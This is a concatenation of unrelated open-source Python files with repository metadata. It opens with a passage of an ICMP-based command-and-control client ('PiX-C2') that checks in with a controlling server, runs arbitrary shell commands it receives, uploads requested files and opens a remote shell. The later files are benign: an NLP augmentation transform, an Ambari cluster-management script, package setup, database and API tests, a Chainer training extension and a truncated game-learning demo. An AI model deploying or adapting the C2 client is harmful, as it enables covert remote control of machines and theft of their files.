finishLine = '(FILE_END) ' + botId + ' ' + str(filename)
packet=IP(dst=dest)/ICMP()/finishLine
send(packet)
def sendPingRequest(dest,request,botId):
full_request = request + ' ' + str(botId)
if botId == '123456789':
# Initial Checkin request
packet=IP(dst=dest)/ICMP()/str(request)
else:
packet=IP(dst=dest)/ICMP()/str(full_request)
#packet.show()
#print "[*] Request sent to C2 server: " + request
try:
p=sr1(packet,timeout=10)
#p.show()
if p:
return p
else:
return
except:
printLine( "[X] Error receiving packet",flag)
def processReply(dest,p):
try:
response=p['Raw'].load
printLine("[D] Response: %s" % response, flag)
except:
print "[X] Error: ", sys.exc_info()[0]
return
# Check ICMP data for 'run' command
printLine( "[*] String received from C2 server: " + p['Raw'].load,flag)
if 'run' in response:
printLine( "[*] Master says run command: " + response[4:],flag)
command = response[4:]
command.split()
proc = sub.Popen(command,stdout=sub.PIPE,stderr=sub.PIPE,shell=True)
output, errors = proc.communicate()
printLine( output,flag)
printLine( errors,flag)
elif 'sysinfo' in response:
printLine( "[*] Master requesting sysinfo",flag)
proc = sub.Popen(['uname -a'],stdout=sub.PIPE,stderr=sub.PIPE,shell=True)
output, errors = proc.communicate()
botId=getId()
sendRequest = 'sysinfo %s %s' % (botId,output)
p=sendPingRequest(dest,sendRequest, botId)
if p:
processReply(dest,p)
else:
printLine("[D] No Reply found",flag)
printLine(output,flag)
printLine( errors,flag)
elif 'Thanks' in response:
printLine( "[*] Thanks received",flag)
printLine( "[*] Sleeping for 10",flag)
time.sleep(10)
elif 'get' in response:
printLine( "[*] Master says give him %s" % (response[4:]),flag)
botId=getId()
printLine( "[D] filesSent: %s" % (str(filesSent)),flag)
if response[4:] not in filesSent:
sendFile(dest,response[4:], botId)
filesSent.append(response[4:])
else:
printLine( "[*] File already sent...skipping",flag)
elif 'sleep' in response:
seconds = response[6:]
printLine("[*] Master says sleep for %s seconds" % (seconds),flag)
printLine ("[*] Sleeping...",flag)
setSleep(seconds)
elif 'id=' in response:
printLine("[*] Checked in...placing id in conf file",flag)
setId(response[3:])
elif 'shell' in response:
printLine( "[*] Master wants shell, master gets shell",flag)
time.sleep(10)
pingshell(dest)
def main(dest,flag):
global filesSent
filesSent = []
# check for log directory; create if it doesn't exist
if not os.path.exists('log'):
os.makedirs('log')
printLine("--------------------------------------------",flag)
printLine("PingC.py started on %s" % (date.today()),flag)
printLine("--------------------------------------------",flag)
printLine("[D] flag=%s" % (flag),flag)
while True:
signal.signal(signal.SIGINT, handler)
if int(active()) != 1:
printLine("[*] Not checked in...checking in now",flag)
proc = sub.Popen(['uname -a'],stdout=sub.PIPE,stderr=sub.PIPE,shell=True)
output, errors = proc.communicate()
p=sendPingRequest(dest,'Checkin %s' % output,'123456789')
if p:
processReply(dest,p)
printLine(output,flag)
printLine(errors,flag)
printLine("[D] id==null",flag)
pass
id = getId()
sendStr="What shall I do master?"
p=sendPingRequest(dest,sendStr, id)
if p:
processReply(dest,p)
getSleep()
if __name__ == "__main__":
global flag
parser = argparse.ArgumentParser(version="%prog 1.0",description="PiX-C2 client for icmp based C2")
parser.add_argument('dest', help='Destination IP or hostname for C2', metavar='DEST')
parser.add_argument("-d", "--debug", dest='debug', help="debug level 1-2", metavar="DEBUG", default=0)
args = parser.parse_args()
if args.debug:
flag = args.debug
main(args.dest,flag)
| {
"content_hash": "7c5537f4f2f1ae06a11f8d56cff440f6",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 117,
"avg_line_length": 32.66120218579235,
"alnum_prop": 0.583068428977748,
"repo_name": "nocow4bob/PiX-C2",
"id": "9dbd95091fef3f8613888ec43ee1fe6984dabafe",
"size": "12287",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pix-c.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "10398"
},
{
"name": "Python",
"bytes": "33636"
},
{
"name": "Shell",
"bytes": "529"
}
],
"symlink_target": ""
} |
import json
import os
import spacy
from nlaugmenter.interfaces.SentenceOperation import SentenceOperation
from nlaugmenter.tasks.TaskTypes import TaskType
from nlaugmenter.utils.initialize import spacy_nlp
class DyslexiaWordsSwap(SentenceOperation):
"""Altering some words with mistakes that are likely to happen in the context of dyslexia.
Args:
seed: initial seed. Defaults: 0.
max_outputs: maximum number of generated outputs. Defaults: 1.
"""
tasks = [TaskType.TEXT_CLASSIFICATION, TaskType.TEXT_TO_TEXT_GENERATION]
languages = ["en"]
keywords = [
"lexical",
"rule-based",
"external-knowledge-based",
"aural",
"possible-meaning-alteration",
"low-precision",
"low-coverage",
"low-generations",
]
def __init__(self, seed=0, max_outputs=1):
super().__init__(seed=seed, max_outputs=max_outputs)
self.nlp = spacy_nlp if spacy_nlp else spacy.load("en_core_web_sm")
with open(
os.path.join(os.path.dirname(__file__), "data.json"), "r"
) as infile:
data = json.load(infile)
self.swap_words = {
k: v for dict in data.values() for k, v in dict.items()
}
self.swap_words_2 = {v: k for k, v in self.swap_words.items()}
def generate(self, sentence: str):
end_idx = 0
new_sentence = ""
for word in self.nlp(sentence):
new_sentence += sentence[end_idx : word.idx]
new_word = word.text
key = word.text.lower()
if key in self.swap_words or key in self.swap_words_2:
if key in self.swap_words:
new_word = self.swap_words[key]
if key in self.swap_words_2:
new_word = self.swap_words_2[key]
new_sentence += new_word
end_idx = word.idx + len(word.text)
new_sentence += sentence[end_idx:]
return [new_sentence]
| {
"content_hash": "3266de5f4d6b91d8de1577ded98f3bd1",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 94,
"avg_line_length": 31.6984126984127,
"alnum_prop": 0.586379569354031,
"repo_name": "GEM-benchmark/NL-Augmenter",
"id": "28158fb788c07d1d1209b520e60441dfa13503e4",
"size": "1997",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "nlaugmenter/transformations/dyslexia_words_swap/transformation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "151288"
},
{
"name": "Makefile",
"bytes": "343"
},
{
"name": "Python",
"bytes": "1003016"
}
],
"symlink_target": ""
} |
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import urllib2, ssl
import json
import base64
import optparse
import ConfigParser
HTTP_PROTOCOL = 'http'
HTTPS_PROTOCOL = 'https'
CLUSTERS_URL = '/api/v1/clusters/{0}'
SERVICE_URL = '/services/{0}'
COMPONENT_URL = '/services/{0}/components/{1}'
HOST_COMPONENT_URL = '/hosts/{0}/host_components/{1}'
GET_HOST_COMPONENTS_URL = '/services/{0}/components/{1}?fields=host_components'
STACK_CONFIG_DEFAULTS_URL = '/api/v1/stacks/{0}/versions/{1}/services/{2}/configurations?fields=StackConfigurations/type,StackConfigurations/property_value'
CREATE_CONFIGURATIONS_URL = '/configurations'
GET_ALL_HOST_COMPONENTS_URL = '/host_components'
def api_accessor(host, username, password, protocol, port):
def do_request(api_url, request_type, request_body=''):
try:
url = '{0}://{1}:{2}{3}'.format(protocol, host, port, api_url)
print 'Execute {0} {1}'.format(request_type, url)
if request_body:
print 'Request body: {0}'.format(request_body)
admin_auth = base64.encodestring('%s:%s' % (username, password)).replace('\n', '')
request = urllib2.Request(url)
request.add_header('Authorization', 'Basic %s' % admin_auth)
request.add_header('X-Requested-By', 'ambari')
request.add_data(request_body)
request.get_method = lambda: request_type
response = None
if protocol == 'https':
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
response = urllib2.urlopen(request, context=ctx)
else:
response = urllib2.urlopen(request)
response_body = response.read()
except Exception as exc:
raise Exception('Problem with accessing api. Reason: {0}'.format(exc))
return response_body
return do_request
def get_json(accessor, url):
response = accessor(url, 'GET')
json_resp = json.loads(response)
return json_resp
def apply_configs(options, accessor, configs):
for config in configs:
configs[config].pop("properties", None)
post_configs = {}
post_configs[config] = configs[config]
desired_configs_post_body = {}
desired_configs_post_body["Clusters"] = {}
desired_configs_post_body["Clusters"]["desired_configs"] = post_configs
accessor(CLUSTERS_URL.format(options.cluster), 'PUT', json.dumps(desired_configs_post_body))
def create_configs(options, accessor, merged_properties, tag):
configs_for_posts = {}
for config_type in merged_properties:
config = {}
config['type'] = config_type
config['tag'] = tag
config['properties'] = merged_properties[config_type]
configs_for_posts[config_type] = config
accessor(CLUSTERS_URL.format(options.cluster) + CREATE_CONFIGURATIONS_URL, 'POST', json.dumps(config))
return configs_for_posts
def generate_component_hosts_ini(options, accessor):
component_hosts_result={}
supported_components = options.component_list.split(',')
hosts_components_response = get_json(accessor, CLUSTERS_URL.format(options.cluster) + GET_ALL_HOST_COMPONENTS_URL)
if 'items' in hosts_components_response and len(hosts_components_response['items']) > 0:
for host_role_data in hosts_components_response['items']:
host_roles = host_role_data['HostRoles']
component_name = host_roles['component_name']
if component_name in supported_components:
host_name = host_roles['host_name']
if component_name not in component_hosts_result:
component_hosts_result[component_name]=[]
if host_name not in component_hosts_result[component_name]:
component_hosts_result[component_name].append(host_name)
config = ConfigParser.RawConfigParser()
for component in component_hosts_result:
config.add_section(component)
config.set(component, 'hosts', ",".join(component_hosts_result[component]))
with open(options.ini_file, 'w') as f:
config.write(f)
def get_stack_default_properties(stack_default_properties_json):
stack_default_properties = {}
if 'items' in stack_default_properties_json and len(stack_default_properties_json['items']) > 0:
for stack_properties in stack_default_properties_json['items']:
if 'StackConfigurations' in stack_properties:
first_stack_props = stack_properties['StackConfigurations']
config_type = first_stack_props['type'].replace('.xml','')
if config_type not in stack_default_properties:
stack_default_properties[config_type] = {}
stack_default_properties[config_type][first_stack_props['property_name']] = first_stack_props['property_value']
return stack_default_properties
def create_host_components(options, accessor, components_hosts, component_name):
for component_host in components_hosts:
accessor(CLUSTERS_URL.format(options.cluster) + HOST_COMPONENT_URL.format(component_host, component_name), 'POST')
def get_component_hosts(component_host_object_list):
host_names = []
if "host_components" in component_host_object_list and len(component_host_object_list['host_components']) > 0:
for host_component in component_host_object_list['host_components']:
if 'HostRoles' in host_component:
host_names.append(host_component['HostRoles']['host_name'])
return host_names
def merge_properties(properties, stack_default_properties):
new_properties = {}
print 'Processing new properties...'
for new_properties_config_type in stack_default_properties:
if new_properties_config_type in properties:
for old_config in properties[new_properties_config_type]:
if old_config in stack_default_properties[new_properties_config_type] \
and stack_default_properties[new_properties_config_type][old_config] != \
properties[new_properties_config_type][old_config]:
print 'Override {0}/{1} property from the backup.'.format(new_properties_config_type, old_config)
stack_default_properties[new_properties_config_type][old_config] = properties[new_properties_config_type][old_config]
new_properties[new_properties_config_type] = stack_default_properties[new_properties_config_type]
return new_properties
def start_service(options, accessor, parser):
'''
Start service
'''
start_body = '{"RequestInfo": {"context" :"Start ' + options.service + '"}, "Body": {"ServiceInfo": {"state": "STARTED"}}}'
accessor(CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service), 'PUT', start_body)
def stop_service(options, accessor, parser):
'''
Stop service
'''
stop_body = '{"RequestInfo": {"context" :"Stop ' + options.service + '"}, "Body": {"ServiceInfo": {"state": "INSTALLED"}}}'
accessor(CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service), 'PUT', stop_body)
def install_service(options, accessor, parser):
'''
Install service
'''
install_body = '{"RequestInfo": {"context" :"Install ' + options.service + '"}, "Body": {"ServiceInfo": {"state": "INSTALLED"}}}'
accessor(CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service), 'PUT', install_body)
def remove_service(options, accessor, parser):
'''
Remove Solr service
'''
accessor(CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service), 'DELETE')
def configure(options, accessor, parser):
'''
Configure service - put next to another components or provide the host list
'''
accessor(CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service), 'POST')
accessor(CLUSTERS_URL.format(options.cluster) + COMPONENT_URL.format(options.service, options.component), 'POST')
stack_default_properties = get_stack_default_properties(get_json(accessor, STACK_CONFIG_DEFAULTS_URL.format(options.stack_name, options.stack_version, options.service)))
hosts = None
if options.hosts_list:
hosts = options.hosts_list.split(",")
else:
hosts = get_component_hosts(get_json(accessor, CLUSTERS_URL.format(options.cluster) + GET_HOST_COMPONENTS_URL.format(options.next_to_service, options.next_to_component)))
configs = create_configs(options, accessor, stack_default_properties, "tag123456")
apply_configs(options, accessor, configs)
create_host_components(options, accessor, hosts, options.component)
if __name__=="__main__":
parser = optparse.OptionParser("usage: %prog [options]")
parser.add_option("--action", dest="action", type="string", help="configure | install | start | stop | remove")
parser.add_option("--component", dest="component", type="string", help="component name")
parser.add_option("--service", dest="service", type="string", help="service name")
parser.add_option("--next-to-component", dest="next_to_component", type="string", help="install component where this component installed")
parser.add_option("--next-to-service", dest="next_to_service", type="string", help="install component where this service installed")
parser.add_option("--host", dest="host", default="localhost", type="string", help="hostname for ambari server")
parser.add_option("--hosts-list", dest="hosts_list", type="string", help="comma separated hosts (to install components)")
parser.add_option("--port", dest="port", default=8080, type="int", help="port number for ambari server")
parser.add_option("--cluster", dest="cluster", type="string", help="cluster name")
parser.add_option("--protocol", dest="protocol", default=HTTP_PROTOCOL, help="ambari protocol (http | https)")
parser.add_option("--username", dest="username", default="admin", type="string", help="username for accessing ambari server")
parser.add_option("--password", dest="password", default="admin", type="string", help="password for accessing ambari server")
parser.add_option("--extra-configs", dest="extra_config", type="string", help="configurations to apply with stack defaults")
parser.add_option("--stack-name", dest="stack_name", default="HDP", type="string", help="name of the stack")
parser.add_option("--stack-version", dest="stack_version", default="2.6", type="string", help="version of the stack")
parser.add_option("--ini-file", dest="ini_file", default="ambari_components.ini", type="string", help="Filename of the generated ini file for host components (default: ambari_components.ini)")
parser.add_option("--component-list", dest="component_list", default="INFRA_SOLR,RANGER_ADMIN,ATLAS_SERVER,LOGSEARCH_SERVER", type="string", help="comma separated components")
(options, args) = parser.parse_args()
accessor = api_accessor(options.host, options.username, options.password, options.protocol, options.port)
print 'Inputs: ' + str(options)
if options.action == 'configure':
configure(options, accessor, parser)
elif options.action == 'install':
install_service(options, accessor, parser)
elif options.action == 'start':
start_service(options, accessor, parser)
elif options.action == 'stop':
stop_service(options, accessor, parser)
elif options.action == 'remove':
remove_service(options, accessor, parser)
elif options.action == 'generate-component-hosts':
generate_component_hosts_ini(options, accessor)
else:
parser.print_help()
print 'action option is wrong or missing'
| {
"content_hash": "75b67f27a058b367339c076dc17b07c7",
"timestamp": "",
"source": "github",
"line_count": 243,
"max_line_length": 194,
"avg_line_length": 49.065843621399175,
"alnum_prop": 0.7139981548268053,
"repo_name": "oleewere/ansible-ambari-manager",
"id": "e786bac353310cd70f399ea02ea0e22a5596bf7f",
"size": "11946",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/ambari_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "52179"
},
{
"name": "Shell",
"bytes": "17076"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
import sys, os
version = '2.3.0'
setup(name='fusionstorbackupstorage',
version=version,
description="ZStack FUSIONSTOR backup storage agent",
long_description="""\
ZStack FUSIONSTOR backup storage agent""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='fusionstor zstack',
author='Frank Zhang',
author_email='xing5820@gmail.com',
url='http://zstack.org',
license='Apache License 2',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=True,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points="""
# -*- Entry points: -*-
""",
)
| {
"content_hash": "16083d52262f0064b654176deb42c809",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 95,
"avg_line_length": 31.153846153846153,
"alnum_prop": 0.6234567901234568,
"repo_name": "live4thee/zstack-utility",
"id": "47596947e18e7ccfa7572de4e6b2fba7404c8609",
"size": "810",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fusionstorbackupstorage/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AGS Script",
"bytes": "1147"
},
{
"name": "HTML",
"bytes": "4445"
},
{
"name": "Pascal",
"bytes": "187"
},
{
"name": "Puppet",
"bytes": "10417"
},
{
"name": "Python",
"bytes": "2346166"
},
{
"name": "Shell",
"bytes": "241290"
}
],
"symlink_target": ""
} |
"""Tests for manipulating AttachHandle via the DB API"""
from oslo_utils import uuidutils
from cyborg.common import exception
from cyborg.tests.unit.db import base
from cyborg.tests.unit.db import utils
class TestDbAttachHandle(base.DbTestCase):
def test_create(self):
random_uuid = uuidutils.generate_uuid()
kw = {'uuid': random_uuid}
created_ah = utils.create_test_attach_handle(self.context, **kw)
self.assertEqual(random_uuid, created_ah['uuid'])
def test_get_by_uuid(self):
created_ah = utils.create_test_attach_handle(self.context)
queried_ah = self.dbapi.attach_handle_get_by_uuid(
self.context, created_ah['uuid'])
self.assertEqual(created_ah['uuid'], queried_ah['uuid'])
def test_get_by_id(self):
created_ah = utils.create_test_attach_handle(self.context)
queried_ah = self.dbapi.attach_handle_get_by_id(
self.context, created_ah['id'])
self.assertEqual(created_ah['id'], queried_ah['id'])
def test_update(self):
created_ah = utils.create_test_attach_handle(self.context)
queried_ah = self.dbapi.attach_handle_update(
self.context, created_ah['uuid'], {'attach_type': 'TEST_PCI'})
self.assertEqual('TEST_PCI', queried_ah['attach_type'])
def test_list(self):
uuids = []
for i in range(1, 4):
ah = utils.create_test_attach_handle(
self.context,
id=i,
uuid=uuidutils.generate_uuid())
uuids.append(ah['uuid'])
ahs = self.dbapi.attach_handle_list(self.context)
ah_uuids = [item.uuid for item in ahs]
self.assertEqual(sorted(uuids), sorted(ah_uuids))
def test_list_by_type(self):
ah1 = utils.create_test_attach_handle(
self.context,
id=1,
uuid=uuidutils.generate_uuid(),
attach_type='PCI')
utils.create_test_attach_handle(
self.context,
id=2,
uuid=uuidutils.generate_uuid(),
attach_type='TEST_PCI')
res = self.dbapi.attach_handle_list_by_type(
self.context, attach_type='PCI')
self.assertEqual(1, len(res))
self.assertEqual(ah1['uuid'], res[0]['uuid'])
def test_get_by_filters(self):
ah1 = utils.create_test_attach_handle(
self.context,
id=1,
uuid=uuidutils.generate_uuid(),
deployable_id=1)
utils.create_test_attach_handle(
self.context,
id=2,
uuid=uuidutils.generate_uuid(),
deployable_id=2)
res = self.dbapi.attach_handle_get_by_filters(
self.context, filters={"deployable_id": 1})
self.assertEqual(1, len(res))
self.assertEqual(ah1['uuid'], res[0]['uuid'])
def test_allocate(self):
utils.create_test_attach_handle(
self.context,
id=1,
uuid=uuidutils.generate_uuid(),
deployable_id=1)
allocate_ah = self.dbapi.attach_handle_allocate(
self.context, deployable_id=1)
self.assertTrue(allocate_ah['in_use'])
def test_delete(self):
created_ah = utils.create_test_attach_handle(self.context)
return_value = self.dbapi.attach_handle_delete(
self.context,
created_ah['uuid'])
self.assertIsNone(return_value)
def test_list_filter_is_none(self):
"""The main test is filters=None. If filters=None,
it will be initialized to {}, that will return all attach
handle same as the List Attach Handle API response.
"""
ah1 = utils.create_test_attach_handle(
self.context,
id=1,
uuid=uuidutils.generate_uuid())
res = self.dbapi.attach_handle_get_by_filters(
self.context, filters=None)
self.assertEqual(1, len(res))
self.assertEqual(ah1['uuid'], res[0]['uuid'])
def test_get_by_uuid_not_exist(self):
random_uuid = uuidutils.generate_uuid()
self.assertRaises(exception.ResourceNotFound,
self.dbapi.attach_handle_get_by_uuid,
self.context, random_uuid)
def test_delete_by_uuid_not_exist(self):
random_uuid = uuidutils.generate_uuid()
self.assertRaises(exception.ResourceNotFound,
self.dbapi.attach_handle_delete,
self.context, random_uuid)
def test_do_allocate_attach_handle(self):
dep_id = 100
self.assertRaises(exception.ResourceNotFound,
self.dbapi._do_allocate_attach_handle,
self.context, dep_id)
| {
"content_hash": "ad46992d22e4b3d09999b3fac6606cee",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 74,
"avg_line_length": 37.41732283464567,
"alnum_prop": 0.5875420875420876,
"repo_name": "openstack/nomad",
"id": "de0cae3ec83aaa15c9b1b7604890dc338f88b7ac",
"size": "5384",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cyborg/tests/unit/db/test_db_attach_handle.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3238"
}
],
"symlink_target": ""
} |
from __future__ import division
import numpy as np
from chainer.training import extension
class LinearShift(extension.Extension):
"""Trainer extension to change an optimizer attribute linearly.
This extension changes an optimizer attribute from the first value to the
last value linearly within a specified duration. The typical use case is
warming up of the momentum coefficient.
For example, suppose that this extension is called at every iteration, and
``value_range == (x, y)`` and ``time_range == (i, j)``. Then, this
extension keeps the attribute to be ``x`` up to the ``i``-th iteration,
linearly shifts the value to ``y`` by the ``j``-th iteration, and then
keeps the value to be ``y`` after the ``j``-th iteration.
This extension is also called before the training loop starts by default.
Args:
attr (str): Name of the optimizer attribute to adjust.
value_range (tuple of float): The first and the last values of the
attribute.
time_range (tuple of ints): The first and last counts of calls in which
the attribute is adjusted.
optimizer (~chainer.Optimizer): Target optimizer object. If it is None,
the main optimizer of the trainer is used.
"""
def __init__(self, attr, value_range, time_range, optimizer=None):
self._attr = attr
self._value_range = value_range
self._time_range = time_range
self._optimizer = optimizer
self._t = 0
self._last_value = None
def initialize(self, trainer):
optimizer = self._get_optimizer(trainer)
if self._last_value is not None:
value = self._last_value
else:
value = self._compute_next_value()
self._update_value(optimizer, value)
def __call__(self, trainer):
self._t += 1
optimizer = self._get_optimizer(trainer)
value = self._compute_next_value()
self._update_value(optimizer, value)
def serialize(self, serializer):
self._t = serializer('_t', self._t)
self._last_value = serializer('_last_value', self._last_value)
if isinstance(self._last_value, np.ndarray):
self._last_value = np.asscalar(self._last_value)
def _get_optimizer(self, trainer):
return self._optimizer or trainer.updater.get_optimizer('main')
def _compute_next_value(self):
t1, t2 = self._time_range
v1, v2 = self._value_range
if self._t <= t1:
return v1
elif self._t >= t2:
return v2
rate = (self._t - t1) / (t2 - t1)
return v1 + rate * (v2 - v1)
def _update_value(self, optimizer, value):
setattr(optimizer, self._attr, value)
self._last_value = value
| {
"content_hash": "59e9036a0a2e1cfda9f85a61c32a3dca",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 79,
"avg_line_length": 35.379746835443036,
"alnum_prop": 0.6221824686940965,
"repo_name": "kashif/chainer",
"id": "f021e974115526354b2b26516e61b15447abfa4c",
"size": "2795",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "chainer/training/extensions/linear_shift.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "2730306"
}
],
"symlink_target": ""
} |
from subprocess import *
import os
##
## check datasets
##
print ("// check datasets \\\\")
c = "find ./datasets -name 'out.*' -type f"
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
dataset_files = stdout_value
print "-"*10
##
## check orig graph gpickles
##
c = "find ./datasets -name '*.pickle' -type f"#.format(fname)
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
print "-"*10
##
## check dimacs
##
for f in dataset_files.split("\n"):
fname = os.path.basename(f)
fname = [x for x in fname.split('.') if len(x)>3]
if len(fname) ==1: fname=fname[0]
c = "find ./datasets -name '{}*.dimacs' -type f".format(fname)
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
print "-"*10
##
## check tree decomposition
##
for f in dataset_files.split("\n"):
fname = os.path.basename(f)
fname = [x for x in fname.split('.') if len(x)>3]
if len(fname) ==1: fname=fname[0]
c = "find ./datasets -name '{}*.dimacs.tree' -type f".format(fname)
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
print "-"*10
##
## check production rules
##
for f in dataset_files.split("\n"):
fname = os.path.basename(f)
fname = [x for x in fname.split('.') if len(x)>3]
if len(fname) ==1: fname=fname[0]
c = "find ./ProdRules -name '{}*.prs' -type f".format(fname)
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
print "-"*10
| {
"content_hash": "1b941f4686063925d4fd5a43cda86166",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 68,
"avg_line_length": 28.049180327868854,
"alnum_prop": 0.6633547632963179,
"repo_name": "nddsg/TreeDecomps",
"id": "1cc3b1d96ddafb288b04f5100a2e7297ac4c350e",
"size": "1711",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xplodnTree/core/treeDecomps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "2829280"
},
{
"name": "Jupyter Notebook",
"bytes": "187050"
},
{
"name": "Python",
"bytes": "612322"
},
{
"name": "R",
"bytes": "1183"
},
{
"name": "Shell",
"bytes": "12336"
},
{
"name": "TeX",
"bytes": "3599"
}
],
"symlink_target": ""
} |
import nova.conf
from nova import context
from nova.tests.functional.api_sample_tests import api_sample_base
CONF = nova.conf.CONF
class FloatingIpsBulkTest(api_sample_base.ApiSampleTestBaseV21):
ADMIN_API = True
extension_name = "os-floating-ips-bulk"
def _get_flags(self):
f = super(FloatingIpsBulkTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append('nova.api.openstack.compute.'
'contrib.floating_ips_bulk.Floating_ips_bulk')
return f
def setUp(self):
super(FloatingIpsBulkTest, self).setUp()
pool = CONF.default_floating_pool
interface = CONF.public_interface
self.ip_pool = [
{
'address': "10.10.10.1",
'pool': pool,
'interface': interface,
'host': None
},
{
'address': "10.10.10.2",
'pool': pool,
'interface': interface,
'host': None
},
{
'address': "10.10.10.3",
'pool': pool,
'interface': interface,
'host': "testHost"
},
]
self.compute.db.floating_ip_bulk_create(
context.get_admin_context(), self.ip_pool)
self.addCleanup(self.compute.db.floating_ip_bulk_destroy,
context.get_admin_context(), self.ip_pool)
def test_floating_ips_bulk_list(self):
response = self._do_get('os-floating-ips-bulk')
self._verify_response('floating-ips-bulk-list-resp',
{}, response, 200)
def test_floating_ips_bulk_list_by_host(self):
response = self._do_get('os-floating-ips-bulk/testHost')
self._verify_response('floating-ips-bulk-list-by-host-resp',
{}, response, 200)
def test_floating_ips_bulk_create(self):
response = self._do_post('os-floating-ips-bulk',
'floating-ips-bulk-create-req',
{"ip_range": "192.168.1.0/24",
"pool": CONF.default_floating_pool,
"interface": CONF.public_interface})
self._verify_response('floating-ips-bulk-create-resp', {},
response, 200)
def test_floating_ips_bulk_delete(self):
response = self._do_put('os-floating-ips-bulk/delete',
'floating-ips-bulk-delete-req',
{"ip_range": "192.168.1.0/24"})
self._verify_response('floating-ips-bulk-delete-resp', {},
response, 200)
| {
"content_hash": "5d56fc7d5f67831451a9fce35f9c6382",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 73,
"avg_line_length": 37.9054054054054,
"alnum_prop": 0.5130124777183601,
"repo_name": "bigswitch/nova",
"id": "0af432e95f4cec13cbc9e31afcc2d05a2088a2e2",
"size": "3409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/tests/functional/api_sample_tests/test_floating_ips_bulk.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "17220528"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "291947"
}
],
"symlink_target": ""
} |
'''
Demonstration of learning how to play a VGDL game, when full state information
is *not* available, only observations are, and furthermore,
we don't have access to a model of the dynamics, only to a finite number of rollout sequences.
We use a neural network controller trained by the SNES algorithm.
@author: Tom Schaul
'''
from vgdl.interfaces import GameEnvironment, GameTask
from pybrain.rl.experiments import EpisodicExperiment
from pybrain.rl.agents import LearningAgent
import pylab
from vgdl.core import VGDLParser
from vgdl.plotting import featurePlot, addTrajectory
#TODO: random starting points
def someEpisodes(game_env, net, discountFactor=0.99, maxSteps=100, avgOver=1, returnEvents=False, exploretoo=True):
""" Return the fitness value for one episode of play, given the policy defined by a neural network. """
task = GameTask(game_env)
game_env.recordingEnabled = True
game_env.reset()
net.reset()
task.maxSteps=maxSteps
agent = LearningAgent(net)
agent.learning = False
agent.logging = False
exper = EpisodicExperiment(task, agent)
fitness = 0
for _ in range(avgOver):
rs = exper.doEpisodes(1)
# add a slight bonus for more exploration, if rewards are identical
if exploretoo:
fitness += len(set(game_env._allEvents)) * 1e-6
# the true, discounted reward
fitness += sum([sum([v*discountFactor**step for step, v in enumerate(r)]) for r in rs])
fitness /= avgOver
if returnEvents:
return fitness, game_env._allEvents
else:
return fitness
def buildNet(indim, hidden, outdim=2, temperature=1., recurrent=True):
from pybrain import FullConnection, BiasUnit, TanhLayer, SoftmaxLayer, RecurrentNetwork, LinearLayer, LinearConnection, FeedForwardNetwork, SigmoidLayer
if recurrent:
net = RecurrentNetwork()
else:
net = FeedForwardNetwork()
net.addInputModule(LinearLayer(indim, name = 'i'))
net.addModule(TanhLayer(hidden, name = 'h'))
net.addModule(BiasUnit('bias'))
